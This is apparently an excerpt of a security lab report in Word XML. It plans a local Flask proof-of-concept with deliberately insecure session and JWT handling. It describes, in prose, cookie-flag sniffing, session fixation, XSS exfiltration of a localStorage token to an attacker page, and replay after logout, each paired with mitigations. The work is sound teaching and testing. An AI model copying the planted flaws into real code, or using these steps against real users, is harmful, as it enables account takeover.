              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>No token revocation on logout</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3026" w:type="dxa"/>
            <w:shd w:val="clear" w:fill="EEF3FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">Server does not maintain revocation state; a captured JWT remains valid until natural expiry despite logout.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:shd w:val="clear" w:fill="EEF3FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>S4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:shd w:val="clear" w:fill="EEF3FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>ASVS 3.5.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.3 Proof-of-concept overview</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="300"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The proof of concept is a deliberately minimal but realistic web application that allows a user to register, log in, view a protected dashboard, and log out. It exposes both a session-cookie based authentication path and a JWT bearer token path so that the same user-facing flow can illustrate both server-side session handling and client-side token storage problems. The application is single-host, runs locally inside the SecLab environment, and is never exposed to the public internet. The full source code, evidence files, and Docker configuration are available at https://github.com/Sertyg-a11/prp-token-session.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="300"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">To allow side-by-side comparison without maintaining two codebases, the application supports two configuration profiles: an INSECURE profile that intentionally enables the misconfigurations under study, and a SECURE profile that applies hardened defaults. Switching profiles is a configuration change, not a code change, so the same routes and templates can be exercised in both modes during Sprint 3.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.4 Architecture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Choice</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="48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Rationale</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Backend framework</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Python 3.11 + Flask</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Minimal boilerplate; first-class control over cookies, headers, and session storage; widely used in security teaching material.</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Session backend</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Flask server-side session (filesystem) for cookie path; PyJWT for the JWT path</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Lets the PoC demonstrate both session-cookie and bearer-token models in the same app.</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Frontend</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Server-rendered Jinja2 templates + a small vanilla JS module for the JWT path</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No SPA framework noise; keeps the attention on cookies, storage, and request behaviour.</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Persistence</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SQLite via SQLAlchemy</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Single-file DB, easy to reset between attack runs.</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Transport</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HTTP for the insecure profile; self-signed HTTPS via mkcert for the secure profile</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Lets the report show the impact of the Secure cookie flag and HSTS without requiring a public certificate.</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Tooling</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Browser DevTools, mitmproxy or Burp Community (local only)</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Inspect cookies, headers, requests; replay tokens; observe storage.</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Isolation</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Docker Compose: app container + attacker container on a private bridge network</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Reproducible setup, contains all attack traffic to the host.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Module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B5B5" w:sz="4"/>
              <w:left w:val="single" w:color="B5B5B5" w:sz="4"/>
              <w:bottom w:val="single" w:color="B5B5B5" w:sz="4"/>
              <w:right w:val="single" w:color="B5B5B5" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="F5F5F5"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prp-token-session/</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">├── app/</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">│   ├── __init__.py        # Flask factory; loads INSECURE or SECURE config</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">│   ├── config.py          # Two profiles: InsecureConfig, SecureConfig</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">│   ├── auth_session.py    # Cookie-based login/logout (vulnerable + hardened)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">│   ├── auth_jwt.py        # JWT issue / verify (localStorage path)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">│   ├── routes.py          # /login, /dashboard, /logout, /api/me</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">│   ├── models.py          # User, RevokedToken</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">│   └── templates/         # Jinja2 templates incl. an XSS-vulnerable comment box</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">├── attacker/</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">│   ├── xss_payload.html   # Hosted exfil page</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">│   └── fixation.py        # Helper script that pre-issues a session cookie</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">├── docker-compose.yml</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">└── README.md</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.5 Data flow and authentication model</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="300"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The application supports two authentication paths in parallel. The cookie path follows the classic server-session model: the server stores the session state and identifies the client through a session cookie. The JWT path follows the typical SPA-style model: the server issues a signed token that the client stores and presents on each request.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cookie session path</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The browser POSTs credentials to /login over the application transport (HTTP in INSECURE, HTTPS in SECURE).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The server validates credentials, creates a server-side session record, and returns a Set-Cookie header for the session ID.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">On every subsequent request, the browser attaches the cookie; the server resolves the session record and authenticates the request.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">On /logout, the server deletes the session record and instructs the browser to expire the cookie.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">JWT bearer path</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The browser POSTs credentials to /api/login.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The server returns a signed JWT access token in the JSON response body.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The client (JS) stores the token. In INSECURE mode it stores it in localStorage; in SECURE mode it is held only in memory or in an HttpOnly cookie.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The client sends the token in the Authorization: Bearer header on each API request to /api/me.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">On /api/logout, the server adds the token's identifier (jti) to a revocation list (only enforced in SECURE mode); INSECURE mode performs no server-side revocation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Trust boundaries</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="300"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Three trust boundaries are relevant for the analysis: (1) the network boundary between the browser and the server; (2) the browser boundary between the application origin and any other origin or script; and (3) the server boundary between the request handler and the session store. Each attack scenario in section 4.7 is mapped to the boundary it crosses.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.6 Threat model and attacker assumptions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="300"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The threat model adopts a network-adjacent attacker for transport-related issues and an application-context attacker for storage and lifecycle issues. The attacker is not assumed to have control of the server, of the underlying TLS infrastructure, or of the user's operating system. They are assumed to have the abilities described below, which are deliberately conservative and reflect what an attacker on a public Wi-Fi network or behind a malicious script tag could realistically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900"/>
        <w:gridCol w:w="2960"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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Capability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="19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Granted to attacker?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="29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Used in scenario</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Read or modify HTTP traffic on a shared network segment (no TLS)</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Yes (when target uses HTTP)</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S1 — Missing cookie flags</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Set a cookie in the victim's browser by tricking them into visiting a controlled URL</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Yes</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S2 — Session fixation</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Inject a script into the application via a stored or reflected XSS sink</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Yes (deliberate sink in PoC)</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S3 — XSS-driven token theft</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Replay a previously valid token after the user has logged out</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Yes (token captured earlier)</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S4 — Broken logout</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Break TLS, recover the JWT signing key, or compromise the server</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No</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Out of scope</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Compromise the user's OS, browser, or password manager</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No</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Out of scope</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.7 Selected attack scenarios</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="300"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Four attack scenarios are implemented in Sprint 2. Each scenario is described with the underlying weakness, a precise reproduction procedure, the evidence to be captured, and the mitigation that will be applied in Sprint 3 to produce the comparison.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.7.1 Scenario S1 — Missing cookie security flags</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="300"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Weakness. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">The session cookie is set without the Secure, HttpOnly, and SameSite attributes. The cookie therefore travels over HTTP, is readable from JavaScript via document.cookie, and is sent on cross-site navigations.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="300"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Reproduction. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Run the app in INSECURE mode over HTTP. Log in and inspect the Set-Cookie header in DevTools to confirm the absent flags. From the attacker container, capture the cookie via tcpdump on the bridge network. Separately, paste a small JS snippet into the browser console (simulating a successful XSS) and read document.cookie. Finally, trigger a state-changing GET from a different origin and observe that the cookie is attached.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="300"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Evidence to collect. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">DevTools screenshot of the Set-Cookie header; pcap excerpt showing the cookie in cleartext; console screenshot of document.cookie; cross-site request log.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="300"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Sprint 3 mitigation. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Set Secure, HttpOnly, and SameSite=Lax (or Strict where compatible). Serve over HTTPS with HSTS in the SECURE profile.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.7.2 Scenario S2 — Session fixation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="300"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Weakness. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">The application keeps the same session identifier before and after authentication. An attacker who can plant a chosen session ID in the victim's browser before login keeps a valid session ID for the same authenticated session after the victim logs in.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="300"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Reproduction. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">From the attacker container, request /login to obtain an unauthenticated session ID. Use a crafted link (e.g. /set?sid=...) or a permissive cookie scope on a sibling subdomain to force this ID into the victim's browser. The victim logs in normally. The attacker then reuses the same session ID from their own browser and lands inside the victim's authenticated session.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="300"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Evidence to collect. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Cookie value before and after login showing the same ID; screen recording of the attacker browser entering the dashboard with the planted ID.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="300"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Sprint 3 mitigation. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Regenerate the session identifier on successful authentication and on privilege change; bind the session to additional context (e.g. user-agent or first-seen IP block) where appropriate.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.7.3 Scenario S3 — Token theft via XSS (JWT in localStorage)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="300"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Weakness. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">The JWT path stores the access token in window.localStorage and the dashboard page contains a deliberate stored-XSS sink (an unsanitised "public note" field rendered with the |safe filter). Any script running in the page origin can read the token and exfiltrate it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="300"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Reproduction. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Attacker registers a low-privilege user, posts a note containing a script tag that fetches an attacker-hosted page with the localStorage token in the query string. Victim views the page; the attacker server logs the token. The attacker uses the token from curl to call /api/me and confirms account access.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="300"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Evidence to collect. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Source view of the rendered note, attacker server log line containing the JWT, decoded JWT payload, successful curl response from /api/me using the stolen token.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="300"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Sprint 3 mitigation. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Stop storing the token in localStorage; use an HttpOnly, Secure cookie or in-memory storage with refresh via a Same-Site cookie. Apply contextual output escaping and a strict Content Security Policy. Sanitise the note field on input.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.7.4 Scenario S4 — Broken logout / failed token invalidation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="300"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Weakness. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">The /api/logout endpoint only deletes the token client-side; the server keeps no revocation state and continues to accept the previously issued JWT until its natural expiry. Any token captured before logout (for example via S3 or via a brief shoulder surf) remains usable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="300"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Reproduction. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Capture a JWT during a normal session. Log out via the UI. From an attacker tool (curl/Postman), present the captured JWT to /api/me and observe a 200 response with the user's data, despite the logout.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="300"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Evidence to collect. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Two timestamped curl outputs (before and after the logout click) showing the same token still authenticating; server log confirming no revocation event.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="300"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Sprint 3 mitigation. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Add a server-side revocation list keyed by jti, check it on every protected request, and shorten access-token lifetime with a refresh token rotated on use. For the cookie path, ensure the server-side session record is destroyed at logout.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.8 Vulnerable implementation plan</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="300"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The vulnerable variant is built first so that each scenario in 4.7 can be reproduced end-to-end before any mitigation is added. The table below maps each scenario to the concrete code changes required in the INSECURE profile and the order in which they will be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700"/>
        <w:gridCol w:w="1700"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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Implementation step</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Where</w:t>
            </w:r>
          </w:p>
        </w:tc>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Maps to</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1</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Bootstrap Flask app, SQLite, base templates, /register and /login routes.</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app/__init__.py, routes.py, templates/</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Foundation</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2</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Issue session cookie WITHOUT Secure, HttpOnly, SameSite; serve over HTTP.</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config.py (InsecureConfig), auth_session.py</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S1</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3</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Reuse same session ID across authentication (do not call regenerate).</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auth_session.py (post-login handler)</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S2</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4</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Add JWT login endpoint; client JS stores token in localStorage; render dashboard.</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auth_jwt.py, templates/dashboard.html</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S3 prep</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5</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Add a public-notes feature with unsanitised render (|safe) to host the XSS sink.</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routes.py, templates/notes.html</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S3</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6</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Implement /api/logout that only clears the client-side token; no server revocation.</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auth_jwt.py</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S4</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7</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Write reproduction scripts in attacker/ and capture the first round of evidence.</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attacker/*</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S1–S4</w:t>
